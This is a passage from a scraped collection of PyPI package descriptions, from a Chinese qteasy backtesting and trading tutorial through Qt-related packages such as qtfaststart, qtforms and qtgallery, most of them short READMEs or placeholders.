\u6295\u8d44\u8d44\u4ea7\u6c60\uff0c\u5373\u5141\u8bb8\u6295\u8d44\u7684\u80a1\u7968\u6216\u6307\u6570\uff0c\u6b64\u5904\u4e3a\u6caa\u6df1300\u6307\u6570asset_type='IDX',# \u6295\u8d44\u8d44\u4ea7\u7c7b\u578b\uff0cIDX\u8868\u793a\u6307\u6570\uff0cE\u8868\u793a\u80a1\u7968invest_cash_amounts=[100000],# \u521d\u59cb\u6295\u8d44\u8d44\u91d1\uff0c\u6b64\u5904\u4e3a10\u4e07\u5143invest_start='20220501',# \u6295\u8d44\u56de\u6d4b\u5f00\u59cb\u65e5\u671finvest_end='20221231',# \u6295\u8d44\u56de\u6d4b\u7ed3\u675f\u65e5\u671fcost_rate_buy=0.0003,# \u4e70\u5165\u8d39\u7387\uff0c\u6b64\u5904\u4e3a0.03%cost_rate_sell=0.0001,# \u5356\u51fa\u8d39\u7387\uff0c\u6b64\u5904\u4e3a0.01%visual=True,# \u6253\u5370\u53ef\u89c6\u5316\u56de\u6d4b\u56fe\u8868trade_log=True# \u6253\u5370\u4ea4\u6613\u65e5\u5fd7)\u8f93\u51fa\u7ed3\u679c\u5982\u4e0b\uff1a====================================\n | |\n | BACK TESTING RESULT |\n | |\n ====================================\n\nqteasy running mode: 1 - History back testing\ntime consumption for operate signal creation: 4.4 ms\ntime consumption for operation back looping: 82.5 ms\n\ninvestment starts on 2022-05-05 00:00:00\nends on 2022-12-30 00:00:00\nTotal looped periods: 0.7 years.\n\n-------------operation summary:------------\nOnly non-empty shares are displayed, call \n\"loop_result[\"oper_count\"]\" for complete operation summary\n\n Sell Cnt Buy Cnt Total Long pct Short pct Empty pct\n000300.SH 6 6 12 56.4% 0.0% 43.6% \n\nTotal operation fee: \u00a5 257.15\ntotal investment amount: \u00a5 100,000.00\nfinal value: \u00a5 105,773.09\nTotal return: 5.77% \nAvg Yearly return: 8.95%\nSkewness: 0.58\nKurtosis: 3.54\nBenchmark return: -3.46% \nBenchmark Yearly return: -5.23%\n\n------strategy loop_results indicators------ \nalpha: 0.142\nBeta: 1.003\nSharp ratio: 0.637\nInfo ratio: 0.132\n250 day volatility: 0.138\nMax drawdown: 11.92% \n peak / valley: 2022-08-17 / 2022-10-31\n recovered on: Not recovered!\n\n===========END OF REPORT=============\u4ea4\u6613\u7b56\u7565\u7684\u53c2\u6570\u8c03\u4f18\u4ea4\u6613\u7b56\u7565\u7684\u8868\u73b0\u4e0e\u53c2\u6570\u6709\u5173\uff0c\u5982\u679c\u8f93\u5165\u4e0d\u540c\u7684\u53c2\u6570\uff0c\u7b56\u7565\u56de\u62a5\u76f8\u5dee\u4f1a\u975e\u5e38\u5927\u3002qteasy\u53ef\u4ee5\u7528\u591a\u79cd\u4e0d\u540c\u7684\u4f18\u5316\u7b97\u6cd5\uff0c\u5e2e\u52a9\u641c\u7d22\u6700\u4f18\u7684\u7b56\u7565\u53c2\u6570\uff0c\u8981\u4f7f\u7528\u7b56\u7565\u4f18\u5316\u529f\u80fd\uff0c\u9700\u8981\u8bbe\u7f6e\u4ea4\u6613\u7b56\u7565\u7684\u4f18\u5316\u6807\u8bb0opt_tag=1\uff0c\u5e76\u914d\u7f6e\u73af\u5883\u53d8\u91cfmode=2\u5373\u53ef:importqteasyasqtop=qt.Operator(strategies='dma')op.set_parameter('dma',opt_tag=1)res=op.run(mode=2,# \u4f18\u5316\u6a21\u5f0fopti_start='20220501',# \u4f18\u5316\u533a\u95f4\u5f00\u59cb\u65e5\u671fopti_end='20221231',# \u4f18\u5316\u533a\u95f4\u7ed3\u675f\u65e5\u671ftest_start='20220501',# \u6d4b\u8bd5\u533a\u95f4\u5f00\u59cb\u65e5\u671ftest_end='20221231',# \u6d4b\u8bd5\u533a\u95f4\u7ed3\u675f\u65e5\u671fopti_sample_count=1000,# \u4f18\u5316\u6837\u672c\u6570\u91cfvisual=True,# \u6253\u5370\u4f18\u5316\u7ed3\u679c\u56fe\u8868parallel=False)# \u4e0d\u4f7f\u7528\u5e76\u884c\u8ba1\u7b97qteasy\u5c06\u5728\u540c\u4e00\u6bb5\u5386\u53f2\u6570\u636e\uff08\u4f18\u5316\u533a\u95f4\uff09\u4e0a\u53cd\u590d\u56de\u6d4b\uff0c\u627e\u5230\u7ed3\u679c\u6700\u597d\u768430\u7ec4\u53c2\u6570\uff0c\u5e76\u628a\u8fd930\u7ec4\u53c2\u6570\u5728\u53e6\u4e00\u6bb5\u5386\u53f2\u6570\u636e\uff08\u6d4b\u8bd5\u533a\u95f4\uff09\u4e0a\u8fdb\u884c\u72ec\u7acb\u6d4b\u8bd5\uff0c\u5e76\u663e\n\u793a\u72ec\u7acb\u6d4b\u8bd5\u7684\u7ed3\u679c\uff1a==================================== \n| |\n| OPTIMIZATION RESULT |\n| |\n====================================\n\nqteasy running mode: 2 - Strategy Parameter Optimization\n\n... # \u7701\u7565\u90e8\u5206\u8f93\u51fa\n\n# \u4ee5\u4e0b\u662f30\u7ec4\u4f18\u5316\u7684\u7b56\u7565\u53c2\u6570\u53ca\u5176\u7ed3\u679c\uff08\u90e8\u5206\u7ed3\u679c\u7701\u7565\uff09\n Strategy items Sell-outs Buy-ins ttl-fee FV ROI Benchmark rtn MDD \n0 (35, 69, 60) 1.0 2.0 71.45 106,828.20 6.8% -3.5% 9.5%\n1 (124, 104, 18) 3.0 2.0 124.86 106,900.59 6.9% -3.5% 7.4%\n2 (126, 120, 56) 1.0 1.0 72.38 107,465.86 7.5% -3.5% 7.5%\n...\n27 (103, 84, 70) 1.0 1.0 74.84 114,731.44 14.7% -3.5% 8.8%\n28 (143, 103, 49) 1.0 1.0 74.33 116,453.26 16.5% -3.5% 4.3%\n29 (129, 92, 56) 1.0 1.0 74.55 118,811.58 18.8% -3.5% 4.3%\n\n===========END OF REPORT=============\u5c06\u4f18\u5316\u540e\u7684\u53c2\u6570\u5e94\u7528\u5230\u7b56\u7565\u4e2d\uff0c\u5e76\u518d\u6b21\u56de\u6d4b\uff0c\u53ef\u4ee5\u770b\u5230\u7ed3\u679c\u660e\u663e\u63d0\u5347\uff1aop.set_parameter('dma',pars=(143,99,32))res=op.run(mode=1,# \u5386\u53f2\u56de\u6d4b\u6a21\u5f0fasset_pool='000300.SH',# \u6295\u8d44\u8d44\u4ea7\u6c60asset_type='IDX',# \u6295\u8d44\u8d44\u4ea7\u7c7b\u578binvest_cash_amounts=[100000],# \u6295\u8d44\u8d44\u91d1invest_start='20220501',# \u6295\u8d44\u56de\u6d4b\u5f00\u59cb\u65e5\u671finvest_end='20221231',# \u6295\u8d44\u56de\u6d4b\u7ed3\u675f\u65e5\u671fcost_rate_buy=0.0003,# \u4e70\u5165\u8d39\u7387cost_rate_sell=0.0001,# \u5356\u51fa\u8d39\u7387visual=True,# \u6253\u5370\u53ef\u89c6\u5316\u56de\u6d4b\u56fe\u8868trade_log=True,# \u6253\u5370\u4ea4\u6613\u65e5\u5fd7)\u7ed3\u679c\u5982\u4e0b\uff1a\u5173\u4e8e\u7b56\u7565\u4f18\u5316\u7ed3\u679c\u7684\u66f4\u591a\u89e3\u8bfb\u3001\u4ee5\u53ca\u66f4\u591a\u4f18\u5316\u53c2\u6570\u7684\u4ecb\u7ecd\uff0c\u8bf7\u53c2\u89c1\u8be6\u7ec6\u6587\u6863\u90e8\u7f72\u5e76\u5f00\u59cb\u4ea4\u6613\u7b56\u7565\u7684\u5b9e\u76d8\u8fd0\u884cqteasy\u63d0\u4f9b\u4e86\u5728\u547d\u4ee4\u884c\u73af\u5883\u4e2d\u8fd0\u884c\u7684\u4e00\u4e2a\u7b80\u5355\u5b9e\u76d8\u4ea4\u6613\u7a0b\u5e8f\uff0c\u5728\u914d\u7f6e\u597dOperator\u5bf9\u8c61\u5e76\u8bbe\u7f6e\u597d\u7b56\u7565\u540e\uff0c\u81ea\u52a8\u5b9a\u671f\u8fd0\u884c\u3001\u81ea\u52a8\u76ef\u76d8\u3001\u81ea\u52a8\u4e0b\u8f7d\u5b9e\u65f6\u6570\u636e\u5e76\u6839\u636e\u7b56\u7565\u7ed3\u679c\u751f\u6210\u4ea4\u6613\u6307\u4ee4\uff0c\u6a21\u62df\u4ea4\u6613\u8fc7\u7a0b\u5e76\u8bb0\u5f55\u4ea4\u6613\u7ed3\u679c\u3002\u5728Operator\u4e2d\u8bbe\u7f6e\u597d\u4ea4\u6613\u7b56\u7565\uff0c\u5e76\u914d\u7f6e\u597d\u4ea4\u6613\u53c2\u6570\u540e\uff0c\u53ef\u4ee5\u76f4\u63a5\u542f\u52a8\u5b9e\u76d8\u4ea4\u6613\uff1aimportqteasyasqt# \u521b\u5efa\u4e00\u4e2a\u4ea4\u6613\u7b56\u7565alphaalpha=qt.get_built_in_strategy('ndayrate')# \u521b\u5efa\u4e00\u4e2aN\u65e5\u80a1\u4ef7\u6da8\u5e45\u4ea4\u6613\u7b56\u7565# \u8bbe\u7f6e\u7b56\u7565\u7684\u8fd0\u884c\u53c2\u6570alpha.strategy_run_freq='d'# \u6bcf\u65e5\u8fd0\u884calpha.data_freq='d'# \u7b56\u7565\u4f7f\u7528\u65e5\u9891\u6570\u636ealpha.window_length=20# \u6570\u636e\u7a97\u53e3\u957f\u5ea6alpha.sort_ascending=False# \u4f18\u5148\u9009\u62e9\u6da8\u5e45\u6700\u5927\u7684\u80a1\u7968alpha.condition='greater'# \u7b5b\u9009\u51fa\u6da8\u5e45\u5927\u4e8e\u67d0\u4e00\u4e2a\u503c\u7684\u80a1\u7968alpha.ubound=0.005# \u7b5b\u9009\u51fa\u6da8\u5e45\u5927\u4e8e0.5%\u7684\u80a1\u7968alpha.sel_count=7# \u6bcf\u6b21\u9009\u51fa7\u652f\u80a1\u7968# \u521b\u5efa\u4e00\u4e2a\u4ea4\u6613\u5458\u5bf9\u8c61\uff0c\u8fd0\u884calpha\u7b56\u7565op=qt.Operator(alpha,signal_type='PT',op_type='step')# \u8bbe\u7f6e\u7b56\u7565\u8fd0\u884c\u53c2\u6570# \u4ea4\u6613\u80a1\u7968\u6c60\u5305\u62ec\u6240\u6709\u7684\u94f6\u884c\u80a1\u548c\u5bb6\u7528\u7535\u5668\u80a1asset_pool=qt.filter_stock_codes(industry='\u94f6\u884c, \u5bb6\u7528\u7535\u5668',exchange='SSE, SZSE')qt.configure(mode=0,# \u4ea4\u6613\u6a21\u5f0f\u4e3a\u5b9e\u76d8\u8fd0\u884casset_type='E',# \u4ea4\u6613\u7684\u6807\u7684\u7c7b\u578b\u4e3a\u80a1\u7968asset_pool=asset_pool,# \u4ea4\u6613\u80a1\u7968\u6c60\u4e3a\u6240\u6709\u94f6\u884c\u80a1\u548c\u5bb6\u7528\u7535\u5668\u80a1trade_batch_size=100,# \u4ea4\u6613\u6279\u91cf\u4e3a100\u80a1\u7684\u6574\u6570\u500dsell_batch_size=1,# \u5356\u51fa\u6570\u91cf\u4e3a1\u80a1\u7684\u6574\u6570\u500dlive_trade_account_id=1,# \u5b9e\u76d8\u4ea4\u6613\u8d26\u6237IDlive_trade_account='user name',# \u5b9e\u76d8\u4ea4\u6613\u7528\u6237\u540d)qt.run(op)\u6b64\u65f6qteasy\u4f1a\u542f\u52a8\u4e00\u4e2aTrader Shell\u547d\u4ee4\u884c\u754c\u9762\uff0c\u540c\u65f6\u4ea4\u6613\u7b56\u7565\u4f1a\u81ea\u52a8\u5b9a\u65f6\u8fd0\u884c\uff0c\u8fd0\u884c\u7684\u53c2\u6570\u968fQT_CONFIG\u800c\u5b9a\u3002\u542f\u52a8TraderShell\u540e\uff0c\u6240\u6709\u4ea4\u6613\u76f8\u5173\u7684\u91cd\u8981\u4fe1\u606f\u90fd\u4f1a\u663e\u793a\u5728console\u4e2d\uff1a\u6b64\u65f6\u63a7\u5236\u53f0\u4e0a\u4f1a\u663e\u793a\u5f53\u524d\u4ea4\u6613\u6267\u884c\u72b6\u6001\uff1a\u5f53\u524d\u65e5\u671f\u3001\u65f6\u95f4\u3001\u8fd0\u884c\u72b6\u6001\u4ea7\u751f\u7684\u4ea4\u6613\u4fe1\u53f7\u548c\u4ea4\u6613\u8ba2\u5355\u4ea4\u6613\u8ba2\u5355\u7684\u6210\u4ea4\u60c5\u51b5\u8d26\u6237\u8d44\u91d1\u53d8\u52a8\u60c5\u51b5\u8d26\u6237\u6301\u4ed3\u53d8\u52a8\u60c5\u51b5\u5f00\u76d8\u548c\u6536\u76d8\u65f6\u95f4\u9884\u544a\u7b49\u5728TraderShell\u8fd0\u884c\u8fc7\u7a0b\u4e2d\u53ef\u4ee5\u968f\u65f6\u6309Ctrl+C\u8fdb\u5165Shell\u9009\u5355\uff1aCurrent mode interrupted, Input 1 or 2 or 3 for below options: \n[1], Enter command mode; \n[2], Enter dashboard mode. \n[3], Exit and stop the trader; \nplease input your choice:\u6b64\u65f6\u63091\u53ef\u4ee5\u8fdb\u5165Interactive\u6a21\u5f0f\uff08\u4ea4\u4e92\u6a21\u5f0f\uff09\u3002\u5728\u4ea4\u4e92\u6a21\u5f0f\u4e0b\uff0c\u7528\u6237\u53ef\u4ee5\u5728(QTEASY)\u547d\u4ee4\u884c\u63d0\u793a\u7b26\u540e\u8f93\u5165\n\u547d\u4ee4\u6765\u63a7\u5236\u4ea4\u6613\u7b56\u7565\u7684\u8fd0\u884c\uff1a\u5728\u547d\u4ee4\u884c\u6a21\u5f0f\u4e0b\u53ef\u4ee5\u4e0eTraderShell\u5b9e\u73b0\u4ea4\u4e92\uff0c\u64cd\u4f5c\u5f53\u524d\u8d26\u6237\uff0c\u67e5\u8be2\u4ea4\u6613\u5386\u53f2\u3001\u4fee\u6539\u72b6\u6001\u7b49\uff1apause/resume: \u6682\u505c/\u91cd\u65b0\u542f\u52a8\u4ea4\u6613\u7b56\u7565change: \u4fee\u6539\u5f53\u524d\u6301\u4ed3\u548c\u73b0\u91d1\u4f59\u989dpositions: \u67e5\u770b\u5f53\u524d\u6301\u4ed3orders: \u67e5\u770b\u5f53\u524d\u8ba2\u5355history: \u67e5\u770b\u5386\u53f2\u4ea4\u6613\u8bb0\u5f55exit: \u9000\u51faTraderShell... \u66f4\u591aTraderShell\u547d\u4ee4\u53c2\u89c1QTEASY\u6587\u6863"} +{"package": "qtemplate", "pacakge-description": "qtemplateA command line tool for managing and generating files or scripts from templatesOverviewqtemplateis a linux command line tool that helps generate files from templates, settings/datafiles, and command line prompts. A common task is creating new scripts or files that follow a convention you want to adhere to. You want access to create these base scripts but don't want to have to copy files and manually replace tags.qtempalte is meant to have the feel of shell aliases, where defining a new template is easy and instantiating a new template is easy. By creating a simple directory structure for storing templates, default data, and plugins, we can ensure templates are available at a your fingertips, without pausing.Structureqtemplate supports system level configurations under/etc/qtemplatethat are overwritten by user level configurations under~/.qtemplate/.qtemplate/\n\u251c\u2500\u2500 conf.yaml\n\u2514\u2500\u2500 templates\n \u2514\u2500\u2500 example_template\n \u251c\u2500\u2500 example.jinja\n \u251c\u2500\u2500 example.json\n \u2514\u2500\u2500 example.yamlUnder the conf.yaml, you can configure your template stores. Default template stores are localhost directories.template_storesThe template stores config is the ordering in which templates are looked up. This is a cascading list in the conf.yaml:template_stores:-https://www.qsonlabs.com/qtemplate/registry/templates/-file://user@remote-host/etc/qtemplate/templates-file://localhost/~/.qtemplate/templates/-file://localhost/etc/qtemplate/templatesEach store should be a valid URI andqtemplatewill handle pulling the data using the appropriate connector. If a given template is not found, it will check the next template store in the list. This enables remote template repositoriesTemplatesA template should have at most 3 files:*.jinja - Mandatory file for a template. There should only be one .jinja file and that will be the template usedtemplate.conf - a file used to specify any template level configurations. All of these configs can be overwritten with command line params*.data - any default data that should be supplied to the jinja template. Default data can be provided directly in the jinja file but a separate .data file is more explicit. the *.data file can be json or yaml"} +{"package": "qtensor", "pacakge-description": "No description available on PyPI."} +{"package": "qtensor-qtree", "pacakge-description": "No description available on PyPI."} +{"package": "qt-epics", "pacakge-description": "Qt-based widgets for PyEpics devicesFree software: 3-clause BSD licenseDocumentation: (COMING SOON!)https://JunAishima.github.io/qt-epics.FeaturesTODO"} +{"package": "qterm", "pacakge-description": "QTermQTerm is a Python module for spawning child applications and controlling them automatically.Installpip install qtermUsageTo interract with a child process useQTermclass:fromqtermimportQTermwithQTerm()asterm:print(term.exec('cd'))In case command prompt pattern changes usetemp_promptmethod:fromqtermimportQTerm,PYTHONprint(PYTHON)withQTerm()asterm:withterm.temp_prompt(*PYTHON):print(term.exec('1+1'))# TermArgs(SPAWN_COMMAND='python', PROMPT=re.compile('^>>> '), EXIT_COMMAND='exit()')# ['2']"} +{"package": "qtest", "pacakge-description": "UNKNOWN"} +{"package": "qtestpackage", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qtestpackage2", "pacakge-description": "No description available on PyPI."} +{"package": "qtest-reporter", "pacakge-description": "qTest reporterqtest-reporter is a tool that allows you to easily report the results of your automated testing to the qTest test management tool."} +{"package": "qtex", "pacakge-description": "No description available on PyPI."} +{"package": "qtextras", "pacakge-description": "Qt ExtrasGeneral Scientific Python Qt GUI UtilitiesA collection of Python Qt GUI builders and other functions I've found helpful as I develop\npython mockups.Installationqtextraslives in pypi too, so the easiest way to install it is throughpip:pipinstallqtextrasNote that a version of Qt must be installed for it to work, such as PyQt5/6 or Pyside2/6.\nPySide6 will also be installed withpip install qtextras[full]Alternatively, you can do so through downloading the repository:gitclonehttps://gitlab.com/s3a/qtextras\npipinstall-e./qtextras# Or ./qtextras[full] as mentioned aboveUsageUsage will vary depending on the requested capabilities. Check out theexamplesfolder for some usages"} +{"package": "qtfaststart", "pacakge-description": "Quicktime/MP4 Fast StartEnable streaming and pseudo-streaming of Quicktime and MP4 files by\nmoving metadata and offset information to the front of the file.This program is based on qt-faststart.c from the ffmpeg project, which is\nreleased into the public domain, as well as ISO 14496-12:2005 (the official\nspec for MP4), which can be obtained from the ISO or found online.The goals of this project are to run anywhere without compilation (in\nparticular, many Windows and Mac OS X users have trouble getting\nqt-faststart.c compiled), to run about as fast as the C version, to be more\nuser friendly, and to use less actual lines of code doing so.FeaturesWorks everywhere Python (2.6+) can be installedHandles both 32-bit (stco) and 64-bit (co64) atomsHandles any file where the mdat atom is before the moov atomPreserves the order of other atomsCan replace the original file (if given no output file)Installing from PyPiTo install from PyPi, you may useeasy_installorpip:easy_install qtfaststartInstalling from sourceDownload a copy of the source,cdinto the top-levelqtfaststartdirectory, and run:python setup.py installIf you are installing to your system Python (instead of a virtualenv), you\nmay need root access (viasudoorsu).UsageSeeqtfaststart--helpfor more info! If outfile is not present then\nthe infile is overwritten:$ qtfaststart infile [outfile]To run without installing you can use:$ bin/qtfaststart infile [outfile]To see a list of top-level atoms and their order in the file:$ bin/qtfaststart --list infileIf on Windows, the qtfaststart script will not execute, so use:> python -m qtfaststart ...History2013-08-07: Copy input file permissions to output file.2013-08-06: Fix a bug producing 8kb mdat output.2013-07-05: Introduced Python 3 support.2013-07-05: Added launcher via \u2018python -m qtfaststart\u2019.2013-07-05: Internal refactoring for clarity and robustness. Functions\nnow work with named tuples. Backward compatability is maintained. Expect\na future, backward-incompatible release to replace other functions.2013-07-05: Created anAtomnamedtuple to represent a fourcc atom\n(name, stream position, and size).2013-01-28: Support strange zero-name, zero-length atoms, re-license\nunder the MIT license, version bump to 1.72011-11-01: Fix long-standing os.SEEK_CUR bug, version bump to 1.62011-10-11: Packaged and published to PyPi by Greg Taylor\n, version bump to 1.5.2010-02-21: Add support for final mdat atom with zero size, patch by\nDmitry Simakov , version bump to 1.4.2009-11-05: Added \u2013sample option. Version bump to 1.32009-03-13: Update to be more library-friendly by using logging module,\nrename fast_start => process, version bump to 1.22008-10-04: Bug fixes, support multiple atoms of the same type,\nversion bump to 1.12008-09-02: Initial releaseLicenseCopyright (C) 2008 - 2013 Daniel G. Taylor Permission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \u201cSoftware\u201d), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \u201cAS IS\u201d, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE."} +{"package": "qtfaststart2", "pacakge-description": "No description available on PyPI."} +{"package": "qtfind", "pacakge-description": "QtFindgraphical interface for the powerful command findInstallationDescriptionLicenseFeaturesReport a bugScreenshotsChangelogInstallationpip install qtfindTo avoid running the app from the command line, you need to add it to your apps menu:Download thisscriptOpen the terminal andcdto the location ofsetup.shrun:chmod u+x setup.shrun:./setup.shHead to your apps menu, type qtfind or you can find it under Accessories.Description:mag:QtFindis a graphical interface for the powerful commandfind.:mag:QtFindis designed with new comers to linux in mind.:mag:QtFindalso reveals the full command of the selected combination.:mag:QtFindis made with PyQt5from the man pageGNU find searches the directory tree rooted at each given file name by evaluating the given expression from left to right, according to the rules of precedence.LicenseThis program comes with absolutely no warranty.\nSee theGNU General Public Licence, version 3 or later for details.FeaturesDefault and dark (4 tones) themesShow/Copy constructed commandInterrupt searchMost of find options available (refer toman findfor more information)Report a bughttps://github.com/amad3v/QtFind/issuesScreenshotsDark theme (tone: green):Default theme:Changelog1.0.3:Added About QtMinor changes1.0.2:Fixed issue saving settings in different Linux distros (dbm related)1.0.1:Clean-up code1.0:Initial releaseCopyright :copyright: 2019 - amad3v"} +{"package": "qtfn", "pacakge-description": "qtfnIf you need any help with the package, join the discord:https://discord.io/qtfnJ"} +{"package": "qtforms", "pacakge-description": "mikroqtforms is a library that allows you to create simple forms in Qt for Python with the help of\npydantic.InstallationpipinstallqtformsQuick StartfromqtpyimportQtWidgetsfrompydanticimportBaseModel,validator,Fieldimportsysfromqtforms.labeled_registryimportLabeledWidgetRegistryfromqtforms.formimportFormclassMyModel(BaseModel):name:str=Field(\"hundi\",min_length=3,max_length=50,description=\"Your name\")number:int=Field(1,ge=0,le=100,description=\"A number between 0 and 100\")@validator(\"name\")defname_must_contain_space(cls,v):if\" \"notinv:raiseValueError(\"Name must have a space\")returnv.title()if__name__==\"__main__\":app=QtWidgets.QApplication(sys.argv)model=MyModel(name=\"hello world\")##model.events.name.connect(lambda x: print(x))form=Form(LabeledWidgetRegistry(),MyModel,initial_data=dict(name=\"hello world\"),auto_validate=True)form.submit.connect(lambdax:print(x))form.show()sys.exit(app.exec_())DesignFor the design of qtform, we use the following design:Formis the container and controller for the form. It calls the widget registry to spawn the widgets for the fields.\nThese widgets need to follow theFormWidgetinterface, and implement functions to set values and report errors.Formalso handles the validation of the form, and emits asubmitsignal when the form is valid and the submit button is pressed\n(or when auto_submit is enabled on each valid change). Validation is done by pydantic, and the validated values are immediately\nreported to the widgets."} +{"package": "qtft-qopt", "pacakge-description": "No description available on PyPI."} +{"package": "qtgallery", "pacakge-description": "Scraper for generating asphinx-galleryof Qt widgets.This repository serves both as a library for grabbing renderings of Qt widgets\nto add to your ownsphinx-galleryconfig as well as an example of its usage.InstallationFor the time being, clone the repo and install from source:$ git clone git@github.com:ixjlyons/qtgallery.git\n$ cd qtgallery\n$ pip install .Now you should be able to generate the docs/gallery:$ cd doc\n$ make htmlOpen updoc/_build/html/index.htmlto see built docs. They\u2019re currently\nbeing hosted by Read the Docs as well:https://qtgallery.readthedocs.io/ConfigurationTo useqtgalleryin your own documentation, start by setting upsphinx-gallery. This library provides two key components to add to yoursphinx_gallery_conf: animage scraperand areset function:# sphinx conf.pyimportqtgallerysphinx_gallery_conf={...'image_scrapers':(qtgallery.qtscraper,...),'reset_modules':(qtgallery.reset_qapp,...),...}The image scraper is responsible for generating a rendering of all currently\nshown top level widgets.The reset function is for handlingQApplication, allowing you to instantiate\ntheQApplicationsingleton in each example and preventing the Qt event loop\nfrom running and hanging the docs build. That is, examples that run ok standalone\nshould behave ok in generating the gallery.UsageUsage pretty much followssphinx-gallery, but one tip is that you can controlwherethe widget/window is rendered viashow(). See theiterative\nexampleto see how this works.Read the DocsOn Read the Docs,xvfbis required. See their documentation forinstalling\napt packages. This repository also serves as an example (see.readthedocs.yml)."} +{"package": "qtgql", "pacakge-description": "QtGqlGraphQL client for Qt-QML.This project is currently under development, andit is notproduction ready,\nYou can play-around and tell us what is wrong / missing / awesome :smile:.Visit the docs for more info(WIP)."} +{"package": "qt-graph-helpers", "pacakge-description": "== Qt Graph Helpers ==Qt Graph Helpers are a group of PyQt helpers that could not be implemented in python as they would be too slow. They are used in Orange (https://github.com/orange3).= Prerequisites =Qt Graph Helpers need sip and development versions of Qt and PyQt to build. (qt-dev, python-qt-dev or similar on linux).= Installation =To install run:python setup.py install"} +{"package": "qtgrid", "pacakge-description": "qtgridThis pythonqtgridpackage is forPyQt, orPySidedevelopers. It helps to buildQGridLayout'sdynamically and with visual help during implementation time. Note thatqtgridworks in the same way for PyQt6, PyQt5, and PySide6.Please visit thedocumentation homepageto find an example usage, atutorial, areference manual, and for the brave theAPI Documentation.InstallUse pip or pipenvpip install qtgridpipenv install qtgridGet the current development source from GitHubgit clonehttps://github.com/devlog42/qtgridWhen importingqtgrid, for an installation of PyQt6, PyQt5, or PySide6 is tested in that order.\nIf none of these are found, a corresponding error message is issued.ContributionEvery contribution that advances this project is very welcome.If you want to report a bug or ask about a new feature, please visit the dedicatedissuespage. There you'll find suitable templates for your request, including one that is esspecially intended for mistakes in the documentations.However, if you want to get involved in development, please check out theContributionpage first.When you write posts, it goes without saying that you use a friendly language. Of course there is also a separate page on the topic calledCode of Conduct.LicenseTheLicenseof this package comes in terms ofGNU LGPLv3."} +{"package": "qtgui", "pacakge-description": "python3 pyqt wraper"} +{"package": "qth", "pacakge-description": "No description available on PyPI."} +{"package": "qth-alias", "pacakge-description": "No description available on PyPI."} +{"package": "qt-handy", "pacakge-description": "qt-handy"} +{"package": "qth-darksky", "pacakge-description": "No description available on PyPI."} +{"package": "qtheory", "pacakge-description": "It is a Python library implementing the Queueing theory calculations. As my term paper, I am developing a library, implementing the calculus of queuing theory. This library has the objective of characterising some queuing theory params as the queue arrival rate of clients, attendance rate and others\u2026 Implementing in python, this library receives a input file with queue data and gives the output answers. For the undergraduate thesis, I had toke some datas in a real queue and submited to the library as a input, to validate this project."} +{"package": "qth-gc", "pacakge-description": "No description available on PyPI."} +{"package": "qth-ls", "pacakge-description": "No description available on PyPI."} +{"package": "qth-national-rail", "pacakge-description": "No description available on PyPI."} +{"package": "qth-notify", "pacakge-description": "No description available on PyPI."} +{"package": "qth-openwrt-status", "pacakge-description": "No description available on PyPI."} +{"package": "qth-panasonic-viera", "pacakge-description": "No description available on PyPI."} +{"package": "qth-postgres-log", "pacakge-description": "No description available on PyPI."} +{"package": "qThread", "pacakge-description": "qThread provides an simplified and safe way to stop long running\nthreads. Typical uses often look like this:# Test / Usage of the stoppable thread\nclass MyThreadingClass(StoppableThread):\n def __init__(self, a):\n super(MyThreadingClass, self).__init__()\n self.a = a\n self.b = \"World\"\n self.delay = .5 # seconds\n\n def startup(self):\n # Overload the startup function\n print \"My Thread Starting Up...\"\n\n def cleanup(self):\n # Overload the cleanup function\n print \"My Thread Is Shutting Down...\"\n # Close files, ports, etc...\n time.sleep(4)\n print \"Cleanup Complete!\"\n\n def mainloop(self):\n # Some routine to be called over and over\n # ie: reading ports or sockets\n print self.a + \" \" + self.b\n\n # Throttling needs to be done here if the\n # primary function is not blocking\n time.sleep(self.delay)"} +{"package": "qth-registrar", "pacakge-description": "No description available on PyPI."} +{"package": "qth-yarp", "pacakge-description": "No description available on PyPI."} +{"package": "qth-zwave", "pacakge-description": "No description available on PyPI."} +{"package": "qtico", "pacakge-description": "This package provides tools to manage PyQt icon themes.TheQIcon.fromThemeAPI works with icon themes following thefreedesktop icon theme spec,\nwhich is great for Linux systems with installed and enabled themes, but not for Windows or OS X, which lack them.To benefit, you just have to create a theme directory with the right structure and use this package\u2019s functions:icons (The default directory name)\n\u251chicolor\n\u2502\u251c16x16/apps/myapp.png\n\u2502\u251c32x32/apps/myapp.png\n\u2502\u2506\n\u2502\u2514scalable/apps/myapp.svg\n\u2514mypackage-builtin\n \u251c16x16\n \u2502\u251cactions\n \u2502\u2502\u251cdocument-open.png\n \u2502\u2502\u2506\n \u2502\u251cmimetypes\n \u2502\u2502\u251capplication-x-mymime.png\n \u2506\u2506\u2506This package provides the following functions to ease bundling an in-memory icon theme for those systems:write_theme_indicesCreates.index.themefiles from the.pngand.svgfiles.write_resourcesCreate a.qrcand_rc.pyfile to import the icon data from. (Needs the.index.themefiles)write_iconsetCreates a iconset folder for OSX apps, e.g. viapy2app, using thehicolor/x/apps/myapp.pngfiles.install_icon_themeTo be used in a running application to make the builtin icons available.Thehicolor/x/apps/myapp.pngfiles can beinstalled to the system by packagers (/usr/share/icons/hicolor/\u2026)subsequently used in a .desktop file (Icon=myapp)used as window icon (self.setWindowIcon(QIcon.fromTheme('myapp')))"} +{"package": "qtics", "pacakge-description": "Qtics - Quantum Technologies Instrumentation ControlSOverviewQtics is a collection of tools designed to facilitate the instrumentation of theBiQuTe Cryogenic Laboratory.In the experiments folder, some experiments are provided as examples, along with\nvarious helpers.DocumentationYou can find the latest documentationhere.Installation instructionsStable version:To install the latest released version, you can use the standard pip 